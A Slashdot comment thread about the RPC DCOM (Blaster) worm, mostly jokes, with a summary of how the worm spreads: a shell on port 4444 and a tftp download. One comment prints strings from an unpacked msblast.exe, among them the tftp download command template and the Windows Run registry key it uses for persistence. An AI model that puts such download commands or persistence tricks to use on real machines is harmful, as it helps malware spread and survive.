RPC DCOM Worm On The Loose 604
GPez writes "The first of I'm sure many RPC DCOM worms affecting Windows is on its way, according to the Internet Storm Center. Patch those systems!" According to the site, "The worm uses the RPC DCOM vulnerability [affects Win2k through Server 2003] to propagate. Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp."
Great (Score:5, Funny)
Will blocking port 135 at the router stop this worm? Seems like a simple solution for the short term. I would like to see the source for the worm, does anybody have it?
Re:Great (Score:5, Funny)
I have already patched my entire network. (Score:4, Funny)
Balmer (Score:2, Funny)
erm...
security security security... erm
um...
somebody get me more cocain!
New title suggestion for this story (Score:4, Funny)
Shouldn't that be:
Developers, Developers, Developers, Developers, Developers, Developers, Developers, Developers, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!: RPC DCOM Worm On The Loose
Re:Great (Score:3, Funny)
An error occured while loading http://212.192.128.76:4444:
Could not connect to host 212.192.128.76 (port 4444)
I saw it happen LIVE! (Score:5, Funny)
Anyhow, I had just finished that when XP said it was shutting down in 30 seconds. I was like, WTF!
Here I am thinking that I just screwed up their machine with the new apps somehow.
Thanks a bunch, Billy. Guess they'll be punting this one to Longhorn
Re:Great (Score:4, Funny)
Open all your ports and I'll see what I can do!
go ME! (Score:5, Funny)
* Microsoft Windows NT(R) 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server(TM) 2003
Not Affected Software:
* Microsoft Windows Millennium Edition
finally! all these years of running Win ME have paid off! so long suckers!
OMG (Score:5, Funny)
Protection from the virus (Score:3, Funny)
Re:I have already patched my entire network. (Score:5, Funny)
Re:Effects (Score:3, Funny)
Re:I have already patched my entire network. (Score:5, Funny)
Re:Balmer (Score:2, Funny)
Re:I have already patched my entire network. (Score:5, Funny)
Re:Credit... (Score:3, Funny)
From your local neighbourhood fortune cookie file.
-Dom
I'm safe (Score:5, Funny)
You did say this was a RPG worm, right?
Re:go ME! (Score:5, Funny)
Sucks big fat sweaty donkey balls:
* Microsoft Windows Millennium Edition
WINE? (Score:2, Funny)
Thanks.
Port Scan your computer/net (Score:2, Funny)
Re:Credit... (Score:5, Funny)
Is that what they were taking when they wrote the code?
Yawn.... (Score:3, Funny)
Symantec (Score:2, Funny)
Other changes needed (Score:1, Funny)
http://www.microsoft.com/com/tech/DCOM.asp
I got this one... (Score:1, Funny)
The worm, aptly named msblast.exe and happily sitting in my system32 folder, sending itsself to a bunch of random addresses (that happened to be in a reserved netblock and were timing out, go figure) was packed with UPX, after uncompressing and running strings on it here are some interesting finds:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Fun, hah? Way to go you bloody wanker, you made my day. I hope SAN (your right hand) loves you too.
Re:go ME! (Score:2, Funny)
Re:users being hit hard (Score:5, Funny)
Re:On the way? (Score:3, Funny)
Liar, liar, pants never on fire (Score:2, Funny)
It's heeeerrreeee... (Score:2, Funny)
*sigh*
I'm not sure about removing it.... (Score:5, Funny)
Re:I have already patched my entire network. (Score:1, Funny)